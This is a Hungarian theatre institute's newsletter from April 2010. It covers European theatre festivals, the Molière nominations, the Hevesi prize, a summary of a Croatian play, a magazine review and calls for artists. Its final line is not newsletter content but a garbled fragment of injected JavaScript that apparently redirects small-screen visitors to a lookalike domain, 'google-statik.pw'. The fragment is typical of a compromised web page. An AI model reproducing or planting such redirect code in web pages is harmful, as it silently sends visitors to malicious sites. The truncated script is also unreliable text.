OSZMI-ITI HÍRLEVÉL 2010. április

OSZMI-ITI HIRLEVEL 2010/ aprilis

 

1. Hirek, fesztivalok

1.1. Berlin - Theatertreffen 2010

1.2. Mayfest Bristolban

1.3. Theater Der Welt

1.4. Avignoni Fesztival

1.5. Edinburgh Nemzetkozi Fesztival

 

1.6. A 2010-es Moliere-dijra nevezett darabok

1.7. Creative Scotland elnevezesu strategiai testulet letrehozasa

1.8. Hevesi Sandor-dij 2010

 

 

2. Kortars drama

2.1. Ivor Martinic: The Play About Mirjana and Those Around Her (Darab Mirjanarol es az ot korulvevo emberekrol)

 

 

3. Lapszemle

3.1. American Theatre - 2010. aprilisi szam

 

 

4. ITI Figyelo: Felhivas, palyazat, informacio

 

4.1. Felhivas nemzetkozi konferencian valo reszvetelre

 

4.2. Felhivas nemzetkozi utazoprodukcioban valo reszvetelre

 


1. Fesztivalok, hirek

1.1. Berlin - Theatertreffen

 

Iden majus 7. es 23. kozott rendezik meg a nemet szinhazak fesztivaljat Berlinben. Az idei programot het nemet szinhazi kritikus valogatta ki az altaluk megtekintett 350 eloadasbol. A produkciok alapjan elmondhato, hogy mar nem a klasszikus muvek uraljak a repertoart, inkabb a mai eletre reflektalo kortars alkotasok, kifejezesi modok es eszkozok kerultek eloterbe. A valogatok nem feledkeztek meg a nemzetkozi projektekrol sem, igy kerult az idei programba a Bodo Viktor rendezte Handke: Az ora, amikor semmit sem tudtunk egymasrol cimu produkcioja, amely a grazi Schauspielhaus es a Szputnyik Hajozasi Tarsasag kozos produkcioja. A fesztivalon tobbek kozott lathato Andreas Kriegenburg rendezeseben Dea Loher egyik darabja (Deutsches Theater Berlin), Stephan Kimmig szinreviteleben Dennis Kelly: Love and Money cimu muve (Thalia Theater Hamburg), Jelinek egyik darabja (Die Kontrakte des Kaufmanns) Nicolas Stemann rendezeseben (a Thalia Theater Hamburg es a Schauspiel Koln koprodukcioja), Luc Percevaltol pedig Hans Fallada muve szerepel, a Munchner Kammerspiele eloadasaban.

 

1.2. Mayfest Bristolban

A bristoli Mayfestet 2003-ban tartottak meg eloszor, a bristoli Old Vic szinhazban az Arts Council England tamogatasaval. Azota az egesz varosra kiterjedo kulturalis esemennye notte ki magat, rangos muveszeknek otthont adva a vilag minden tajarol. Iden a fesztivalt szamos helyszinen, tobbek kozott a bristoli Arnolfini kortars muveszeti kozpontban, az Old Vicben es egyeb, helyspecifikus terekben rendezik. A Mayfest egyik kiemelkedo, eloadasonkent 500 emberre szamito programja az Electric Hotel David Rosenberg rendezeseben, ami 2010. majus 19. es 22. kozott lathato a bristoli kikotoben. Egy negyemeletes hotel egyszer csak ott terem majd a parton a semmibol. A nezok a szalloda elott ulve, lehallgatokeszulekkel betekinthetnek a hotel belso tereibe, es lakoinak maganeletebe.

1.3. Theater Der Welt

A Theater Der Welt elnevezesu nemzetkozi szinhazi fesztivalt Mulheimben es Essenben tartjak 2010. junius 30. - julius 17. kozott tobb mint harminc orszag reszvetelevel. Ez a rendezveny a Nemzetkozi Szinhazi Intezet kezdemenyezesere jott letre azzal a cellal, hogy a legujabb alkotasokat egy helyen mutassak be Nemetorszagban, minden alkalommal mas varosban. Az idei a tizenkettedik fesztival, amelyre Europabol, Afrikabol, Azsiabol egyarant erkeznek tarsulatok. Ket magyar resztvevoje is lesz a Theater Der Weltnek. Pinter Bela: Szutyok es Mundruczo Kornel: Nehez Istennek lenni cimu eloadasat is meghivtak.

A fesztival gazdag programjarol a kovetkezo honlapon lehet reszletes informaciokat kapni: www.theaterderwelt.de

 

1.4. Avignoni Fesztival

A 64. Avignoni Fesztivalt julius 7-27. kozott tartjak. Az idei program osszeallitasahoz ket alkotot kertek fel a muveszeti tars-igazgatoi feladat betoltesere, Chrostoph Marthaler rendezot es Olivier Cadiot irot. Pontosabban a fesztival a nemet rendezo es a francia iro alkotasainak bemutatasa kore szervezodik. A tobb mint 11 millio euros koltsegvetesbol 34 eloadast tuznek musorra, ebbol husznak Avignonban lesz a premierje, vagy kozvetlenul a fesztival elott mutattak be. A nyitoeloadast a XIV. szazadban epitett Papai Palota udvaran Marthaler rendezi Papperlapapp cimmel, ami egy zenes szinhazi eloadas lesz. Ebben a rendezo kedvenc szineszei is jatszanak majd, tobbek kozott Evelyne Didi. Ezt a bemutatot koveti a svajci rendezo Franciaorszagban eddig meg be nem mutatott alkotasa, a Schutz vor der Zukunft (Vedekezni a jovotol) cimu eloadas, amely azt mutatja be, hogy mit muveltek a naci orvosok egy becsi korhazban. Olivier Cadiot ket darabjat is jatsszak Ludovic Lagarde rendezeseben. A francia dramairo 1956-ban szuletett Parizsban. Rendszeresen dolgozik Pascal Dusapin zeneszerzovel, aki szamara mar tobb librettot irt. 1990-ben Pierre Alfierivel megalapitotta a Revue de Litterature Generale-t. 2002-ben keszult el a Biblia uj francia forditasa, amelyben, az o tolmacsolasaban olvashato az Enekek Eneke. Julius 10-en egyedul lesz majd a Papai Palota hatalmas udvaranak szinpadan, hogy felolvassa L'Affaire Robinson (A Robinson ugy) cimu darabjat. Ugyszinten ezen a helyszinen lesz lathato Shakespeare: II. Richardja Frederic Boyer uj forditasaban es Jean-Baptiste Sastre rendezeseben. 1947-ben Jean Vilar jatszotta a foszerepet abban az eloadasban, ami tulajdonkeppen a fesztival elinditoja volt. A tanc program is nagyon gazdagnak igerkezik, hiszen ujra lathato Anne Teresa De Keersmaeker, Alain Platel, Josef Nadj, Boris Charmatz egy-egy alkotasa.

A fesztival igazgatoi mar most bejelentettek, hogy a kovetkezo evi avignoni program muveszeti tanacsadoja a francia koreografus, Boris Charmatz lesz, aki a Rennes-ben levo Nemzeti Koreografiai Kozpont igazgatoja.

 

1.5. Edinburgh Nemzetkozi Fesztival

 

Megjelent az Edinburgh International Festival 2010 reszletes programja. Ebben az evben, augusztus 13. es szeptember 5. kozott Europa legnagyobb szinhazi fesztivaljat az „oceans apart" [oceanon innen es tul] jegyeben rendezik: kuzdelmes, tengereket atszelo utazasokat varazsolnak elenk, ahol a 14. szazadi europai felfedezok eletuk kockaztatasaval kerestek az uj vilagokat. A fesztival mottoja a gyarmatositas brutalitasat is eszunkbe juttatja, de elsosorban arra a kiterjedt kepzeletbeli teruletre utal, ami a foldreszek rendkivuli kulturalis sokfeleseggel rendelkezo, tobbek kozott Kaliforniabol, New Yorkbol, Mexikobol, Braziliabol, Ecuadorbol, Uj-Zelandrol, Argentinabol, Ausztraliabol, Hollandiabol es Spanyolorszagbol erkezo alkotoit elvalasztja egymastol. Az IVF 2010 ezt a muveszi gazdagsagot kivanja folfedezni, a nezok tudomasara hozni - a vilag minden tajarol erkezo szinhazi nyelvek kozotti parbeszed kialakitasara torekszik. Ime egy kis izelito a fesztivalprogrambol:

A New York-i rendezo, Lee Breuer az Oidipusz Kolonoszban cimu Szophoklesz-tragediat helyezi at modern amerikai kornyezetbe, gospel zene es rock 'n' roll kisereteben. Egy punkosdi predikator vezeti az elbeszeles fonalat, amig a legendas Blind Boys of Alabama minden tagja kollektiven Oidipuszt alakitja. A National Theatre of Scotland osbemutatoja a Caledonia Anthony Neilson rendezeseben: a kapzsisag, az euforia es a tomeges kiabrandulas tortenete. William Paterson egy penzugyi kalandor volt, aki 1698-ban minden idok egyik legmereszebb es legnagyobb katasztrofajahoz vezeto spekulaciojat hajtotta vegre, es belehajszolta az akkori Europa egyik legszegenyebb orszagat, Skociat. Guillermo Calderon Diciembre [December] cimu darabja a sajat rendezeseben valosul meg. Karacsonyeste van 2014-ben. Chile, Peru es Bolivia haboruban allnak egymassal. Egy katona 24 oras eltavozast kap, hogy egyutt unnepelhessen ket terhes ikertestverevel. Az este nem igerkezik nyugodtnak. Amikor a testverei rajonnek, hogy a ferfi nem biztos, hogy visszater a harcvonalba, egyikuk azonnal kesz elrejteni ot, a masik lany viszont irdatlanul duhos lesz. Mindketten probaljak meggyozni ot a haboruval kapcsolatos, teljesen kulonbozo allaspontjukrol. A Diciembre fekete humoru komedia a haboru orszagot es csaladot megoszto termeszeterol.

 

1.6. A 2010-es Moliere-dijra nevezett darabok

 

Franciaorszagban a Moliere-dijak jelolese es atadasa tobb mint husz eve nagy unnepe a francia szinhazi szakmanak, nem teve kulonbseget a kozszolgalati es a maganszinhazak kozott. A franciakra jellemzoen minden evben nagy pompaval rendezik meg onmaguk unnepleset, amelyre iden aprilis 25-en kerul sor, raadasul nem egy Parizs sziveben talalhato maganszinhazban, ahogy eddig. 2010-ben a Parizs egyik kulso keruleteben levo kozszolgalati szinhazban, a Maison des Arts de la Culture de Creteil-ben tartjak meg az unnepi atadot, amelyet a France2 teveallomas eloben kozvetit.

A Moliere-dijak kiosztasat megelozi a jeloles proceduraja. A kituntetesre a dijat adomanyozo egyesulet tagjai vagy az elnokseg altal felkertek jelolhetnek az elmult szezonban latott eloadasok kozul. Kulon dijazzak a legjobb kozszolgalati es maganszinhazi produkciot, a legjobb tarsulatot, a legjobb komediat, de a legjobb francia nyelven iro elo dramairo, valamint adaptacioszerzo alkotasat is.

2010-ben a kovetkezo szerzoket es alkotasokat jeloltek Moliere-dijra: Eric Assous: Illusion conjugale (Hazastarsi illuziok), Daniel Danis: Terre Ocean (OceanFold), Emmanuel Darley: Le mardi a Monoprix (Kedd a bevasarlokozpontban), Pierre Notte: Les couteaux dans le dos (Kesek a hatban), Sebastien Thiery: Qui est monsieur Schmitt? (Ki az a Schmitt ur?) es Joel Pommerat: Cercles/Fictions (Korok/ Fikciok).

A tuneziai szuletesu Assous darabja egy tipikus szerelmi haromszog tortenetet dolgoz fel. A kanadai Daniel Danis muvenek fohose egy halalosan beteg kisfiu, akit apja es bolondos, „varazslo" nagybatyja segit eletenek utolso pillanataiban. A regenyirokent indulo Emmanuel Darley monologjaban egy hajdan fiubol nove lett asszony probalja elfogadtatni magat apolasra szorulo, oreg apjaval. Pierre Notte, a Nouvel Observateur es a Theatre egykori kritikusa muvenek foszereploje ket gyerek, akik kepzeletbeli es valosagos kalandozasaik soran baratsagot kotnek, es vegul elfogadjak magukat olyannak, amilyenek. A szinesz es dramairo Sebastien Thiery Qui est monsieur Schmitt? (Ki az a Schmitt ur?) cimu darabjaban Belier ur es felesege eppen vacsorazik otthon, amikor varatlanul megszolal a telefon, ami azert is furcsa, mert nincs telefon elofizetesuk. Egy bizonyos Schmitt urat keresnek. Es ekkor a hazaspar dobbeneten fedezi fel, hogy nem sajat otthonukban tartozkodnak, hanem egy masik lakas foglyai. Minden arra utal, hogy ok Monsieur es Madame Schmitt, amitol mind a ketten panikba esnek, pedig a remalom csak most kezdodott. Ki a bolond? Mi az igazsag? Egyaltalan kik ok, es ki az a Monsieur Schmitt?

A dijazando eloadasok illetve darabok kozott szerepel Joel Pommerat: Cercles/Fictions-ja. Pommerat 1963-ban szuletett, 1990-ben alapitotta meg sajat tarsulatat. Elso eloadasaikat Parizsban, a Theatre de la Main d'Or-ban mutattak be. A tarsulat a francia miniszteriumtol kap tamogatast, es 2007-2010 kozott ket szinhazban, a Theatre Bretigny-ben es a Theatre des Bouffes du Nord-ban dolgozik. Pommerat nem csak irja, hanem maga is rendezi muveit. A dijra jelolt eloadas nem csak a kritikusokat, hanem a kozonseget is meghoditotta.

A rovid jelenetekbol allo eloadas az identitas, a hatalom, a haboru, az archaikus es a modern vilag szetvalasanak kerdeseit jarja korul. Pommerat azt irja, hogy a jatekban szereplo valamennyi figurat es szituaciot valoban letezo szemelyek es tortenetek inspiraltak. Az onallo jelenetek kozott elso pillantasra nincs kapcsolat, de ahogy az eloadas elore halad, egyre vilagosabb lesz a nezo szamara, hogy a Nagy Haboru, vagyis az elso vilaghaboru kapcsolja ossze ezeket. A Bouffes du Nord-ban a nezoter emelvenyei egy cirkuszi porondra emlekezteto jatekteret fognak korbe, ahol a sorsok keresztezik egymast, evszazadokat ugranak at a szereplok, tukrokon hatolnak at, alomszeru kepek kovetik egymast. A jelenetek kozotti diszletvaltozasok varazslatoknak tunnek, ami a vilagitas- es a hangtervezonek is koszonheto. Az egyik jelenetben peldaul egy nagy, feher teritovel leteritett asztal mellett ul egy ferfi es eszik. Alig lehet kivenni a sotetben mogotte allo szolga alakjat, akinek eloszor csak a hangjat hallani, majd az ur, aki veget akar vetni az ala-folerendelt viszonynak, az asztalahoz ulteti. O viszont nem erzi jol magat ebben a helyzetben es szerepben, ezert vissza is utasitja, mondvan az o helye masutt van: „szeretek szolgalni, de nem tudom, es nem is fogom szeretni Ont" - mondja. Egy masik jelenetben az urno csunyan korholja az o beteg gyereket szoptato dadat, amiert az azt akarta megertetni vele, hogy a gyermeknek szuksege lenne anyja jelenletere. Maskor egy nagyvallalat igazgatoja arrol magyaraz a hosszu ideje munkanelkulive valt embereknek, hogyan kell munkaerejuket aruba bocsataniuk. Elettoredekeket jelenitenek meg a szinpadon a teatralitas szinte valamennyi eszkozenek igenybevetelevel: a szineszek a szinpad homalyabol hangtalanul jonnek elore, hogy amikor a fenybe ernek, furcsa es fantasztikus jeleneseknek tunjenek. Pommerat ebben az eloadasban nem csak az eddig megszokott frontalis nezo-jatekter kapcsolatot veti el, hanem a tortenetmeseles linearis szerkezetet is.

1.7. Creative Scotland elnevezesu strategiai testulet letrehozasa

A skot parlament elfogadta a torvenyjavaslatot a Creative Scotland nevu strategiai testulet letrehozasara, melynek celja a Skocian beluli szinhazmuveszet, a film es egyeb alkotoi teruletek fejlodesenek iranyitasa, tamogatasa. Az uj szervezet atveszi a Scottish Screen es a Scottish Arts Council teljes feladatkoret es penzugyi forrasait, de kibovitett funkciokkal es nagyobb felelosseggel kell hozzajarulnia a szektor fejlesztesehez.

1.8. Hevesi Sandor-dij 2010

 

A Nemzetkozi Szinhazi Intezet Magyar Kozpontja javaslatara, 1998-ban szuletett meg a Hevesi Sandor-dij, amelyet az Oktatasi es Kulturalis Miniszterium, a Fovarosi Onkormanyzat es az ITI Magyar Kozpont hozott letre.

A dijat harom, Magyarorszagon elo es alkoto szinhazmuvesz vagy a szinhazert dolgozo szemely kaphatja, aki muveszi munkajaval, aldozatokat vallalo tettrekeszsegevel, peldaerteku elszantsagaval a legtobbet tette szinhazmuveszetunk kulfoldi megismerteteseert, elismerteteseert. A dijat a tagok elozetes javaslata alapjan letrejott listabol az Oktatasi es Kulturalis Miniszterium szakallamtitkarabol, a Fovarosi Onkormanyzat kepviselojebol es az ITI Magyar Kozpont elnokebol allo kuratorium iteli oda es adja at a Szinhazi Vilagnapon. A kitunteto okleveleket 2010-ben, az Operettszinhazban kivetelesen marcius 29-en adtak at. Iden Alfoldi Robert, a Nemzeti Szinhaz foigazgatoja reszesult Hevesi-dijban magas szinvonalu kulfoldi rendezeseiert, valamint Berczes Laszlo rendezo, a Barka Szinhaz dramaturgja, a Barka Nemzetkozi Fesztival elinditasaert es szervezeseert, es Ladanyi Andrea tancos-szinesz-koreografus, aki sokat tett a tancmuveszet nemzetkozi kapcsolatainak epiteseert.

 

2. Kortars drama

 

Ivor Martinic: The Play About Mirjana and Those Around Her (Darab Mirjanarol es az ot korulvevo emberekrol)

 

Ivor Martinic Splitben szuletett 1984-ben, es a zagrabi Sziniakademian vegzett. A fiatal horvat irogeneracio kiveteles tagja, aki elesen eszleli a haboru utani orszag durvasagait, fobb neuralgikus pontjait. Martinic olyan idoszakrol es helyszinekrol ir, amelyeket jol ismer; irasai melyen tukrozik a lathato, erzekelheto hetkoznapi eletet, a letminimum alatt elok napi letharcat, a megromlott, devalvalodott emberek kozotti viszonyokat, a kozepkoruak vegetalasat es a fiatalok vagyat egy masfajta eletre - ami valahogy nem akar megszuletni.

 

Szereplok: 5 no / 3 ferfi

Bemutato: Jugoslovensko dramsko pozoriste, 2010. februar

 

Ivor Martinic egyfelvonasosaban a negyveneves Mirjana es az ot korulvevo emberek mindennapi elete van a kozeppontban. Mirjana tizenot eves lanyaval, Veronikaval lakik, aki sztar akar lenni, es kamaszos kegyetlenseggel nezi le anyja rossz anyagi helyzetet. Sok ev utan elokerul Simon, Mirjana ex-ferje es Veronika apja, idonkent felhivja oket telefonon, es megigeri, hogy kuld nekik penzt, ami barmelyik pillanatban megerkezhet. Mirjana korul nem allt meg az elet a valasa ota: viszonyt folytat egy idosebb kollegajaval, es flortolni kezd a fiatal Lucio-val, aki otthagyja egy fiatalabb no miatt. Egyszer csak betoppan Grozdana, Mirjana boldogtalan baratnoje, aki megjosolja a sajat ongyilkossagat. Aztan megerkezik Violeta is, Mirjana edesanyja, aki a nap vegen infarktust kap es meghal. Veronika, az unoka harom oraval ezutan lefekszik aludni, semmilyen erzelmi reakciot nem valt ki belole a nagyanyja halala. Mirjana vegul egyedul ul, szivja a cigarettat es issza a kavet.

 

3. Lapszemle

 

3.1. American Theatre - 2010. aprilisi szam

 

Ami eloszor feltunik az American Theatre 2010. aprilisi szamaban, hogy ez a kulonleges kiadas alig kulonbozik egy szakacskonyvtol. Kitepheto, keszletbe gyujtheto kartonkartyak talalhatok benne, amelyeket szineszek, rendezok es dramairok receptjeibol, es azok keletkezesi torteneteibol, szinhazi legendaibol allitottak ossze. Tobbek kozott a kubai szarmazasu, New Yorkban elo dramairo, Eduardo Machado fokhagymas csirkejenek, az arizonai szinesz- es irono Jeanmarie Simpson kulonleges zsomlejenek es limonadejanak, valamint Kenneth Lin dramairo Po Boy Tango cimu dramajaban szereplo erolevesenek titkaiba nyerunk betekintest. Emellett jo nehany cikk szol - igy vagy ugy - a taplalkozas es a szinhaz kapcsolatarol. Igy Tina Howe, a New-York-i dramairono es olyan nagysikeru darabok szerzoje, mint a The Art of Dining (Az etkezes muveszete) Food as a Weapon, Solace and Art cimu irasa szinten az aprilisi szamban olvashato, amelyben Howe az etelhez es az etkezes szertartasaihoz valo viszonyan keresztul azt elemzi, mi a jelentosege az evesnek a sajat dramaiban.

Ebben a szamban Jessica Blank es Erik Jensen szerzoparos perzselo, Aftermath (Kovetkezmeny) cimu doku-dramaja olvashato az iraki haboru civil aldozatainak, megnyomoritott lakossaganak eleterol, valamint egy interju az alkotokkal. Kulon erdekesseg, hogy Eliza Bent egy teljes cikkben lelkesen foglalkozik a 2009-es budapesti Kortars Dramafesztivallal, es annak latszolagos politikamentessegevel, annak ellenere, hogy a berlini fal leomlasanak 20. evfordulojanak unnepe Kozep- es Kelet-Europaban eppen 2009. novemberere esett. De, ahogy az elmenybeszamolobol kiderul, az apolitikussag valoban csak latszolagos volt. A cikk reszletesen kiter a Lorenzaccio-ra (Zsoter Sandor), a Surpriseparty-ra (Karpati Peter), a Phaidra Fitness-re (Bodo Viktor) es a Parhuzamos ora es a Demon gyermekei (Pinter Bela) cimu eloadasokra.

 

 

 

4. ITI Figyelo: Felhivas, palyazat, informacio

 

4.1. Felhivas nemzetkozi konferencian valo reszvetelre

 

A 2010. augusztus 19. es 22. kozott Leibnitz-ben megrendezendo, „Performing Arts Training Today" elnevezesu nemzetkozi konferenciara eloadomuveszek, oktatok jelentkezeset varjak, akik erdeklodnek a kortars eloadomuveszet legujabb tendenciainak kutatasa irant. A konferencia nyitott a kulonbozo mufajok, technikak es muveszeti formak irant, igy konferencia-eloadas tartasara a multimedia, szinhaz, tanc, zene es cirkuszmuveszet teruleterol is lehet jelentkezni.

Tovabbi informacio: http://www.iugte.com/projects/ArtConference.php

Jelentkezesi feltetelek: http://www.iugte.com/projects/register.php

 

 

4.2. Felhivas nemzetkozi utazoprodukcioban valo reszvetelre

 

Az Interkunst e.V egy berlini kulturalis egyesulet, ami jelenleg az "INSTANT ACTS against violence and racism" (Azonnali fellepes az eroszak es a rasszizmus ellen) nevu nemzetkozi szinhazi es tancprojektet szervezi. Evente letrehoznak egy kulonbozo orszagokbol osszevalogatott nemzetkozi muveszekbol allo csoportot.

Jelenleg 17 es 29 ev kozotti fiatal szineszeket, tancosokat keresnek a 2010. oszen megvalosulo utazoprodukciojukhoz.

Tovabbi informacio:   Arkadiusz Zietek

                                    Interkunst e.V
                                    Phone: +49 30 781 40 01

                                    This e-mail address is being protected from spambots. You need JavaScript enabled to view it

Keszitettek: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width